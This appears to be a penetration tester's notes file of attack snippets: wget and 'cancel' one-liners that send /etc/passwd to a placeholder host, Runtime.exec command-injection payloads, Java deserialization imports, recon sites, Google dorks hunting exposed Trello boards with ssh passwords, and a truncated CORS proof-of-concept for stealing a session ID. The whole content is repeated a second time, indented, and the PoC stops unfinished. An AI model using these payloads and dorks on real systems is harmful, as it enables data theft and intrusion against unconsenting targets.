trackscorer

## wget usage
wget http://a.b.c.d:port/$(cat /etc/passwd)

cancel -u "$(cat /etc/passwd)" -h ip:port

## runtime.exec()
Runtime.getRuntime().exec("cmd.exe /c ping a.b.c.d")
Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","ping a.b.c.d"})

## tcpdump
 tcpdump -i venet0 host a.b.c.d -vv -w aa.pcap

## java deserialize http post
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

import org.apache.commons.io.IOUtils;
import org.apache.commons.lang.StringUtils;

## Subdomain collect
https://findsubdomains.com
https://crt.sh/
https://www.virustotal.com
https://subfinder-v2.appspot.com/
https://dnsdumpster.com/
https://community.riskiq.com/login

https://who.is/
http://www.sameip.org/
https://asm.ca.com/en/ping.php

## DNS set
wmic nic get netconnectionid
netsh
interface ip set dns name="以太网" source="static" address="8.8.8.8"
interface ip set dns name="以太网" source="static" address="10.0.0.0"

## DNS Rebind
https://lock.cmpxchg8b.com/rebinder.html

ref:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1447
https://bugs.chromium.org/p/project-zero/issues/detail?id=1471&desc=3

## port
--port 80,81,443,7001,8080,8008,8443,8888,3389,1433,3306,1521,6379,21,8081

## google query
inurl:jira AND intitle:login AND inurl:[company_name]
inurl:https://trello.com AND intext:[company_name]
inurl:https://trello.com AND intext:ssh AND intext:password
site:*.domain.com file type: php

## CORS Exploit
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
	wget http://a.b.c.d:port/$(cat /etc/passwd)

	cancel -u "$(cat /etc/passwd)" -h ip:port
	Runtime.getRuntime().exec("cmd.exe /c ping a.b.c.d")
	Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","ping a.b.c.d"})
	import java.io.BufferedReader;
	import java.io.InputStream;
	import java.io.InputStreamReader;
	import java.io.ObjectOutputStream;
	import java.io.OutputStream;
	import java.net.HttpURLConnection;
	import java.net.URL;

	import org.apache.commons.io.IOUtils;
	import org.apache.commons.lang.StringUtils;
	https://findsubdomains.com
	https://crt.sh/
	https://www.virustotal.com
	https://subfinder-v2.appspot.com/
	https://dnsdumpster.com/
	https://community.riskiq.com/login

	https://who.is/
	http://www.sameip.org/
	https://asm.ca.com/en/ping.php
	wmic nic get netconnectionid
	netsh
	interface ip set dns name="以太网" source="static" address="8.8.8.8"
	interface ip set dns name="以太网" source="static" address="10.0.0.0"
	https://lock.cmpxchg8b.com/rebinder.html

	ref:
	https://bugs.chromium.org/p/project-zero/issues/detail?id=1447
	https://bugs.chromium.org/p/project-zero/issues/detail?id=1471&desc=3
	inurl:jira AND intitle:login AND inurl:[company_name]
	inurl:https://trello.com AND intext:[company_name]
	inurl:https://trello.com AND intext:ssh AND intext:password
	site:*.domain.com file type: php
	<!DOCTYPE html>
	<html>
	<body>
	<center>
	<h2>CORS POC Exploit</h2>
	<h3>Extract SID</h3>

	<div id="demo">
	<button type="button" onclick="cors()">Exploit</button>
	</div>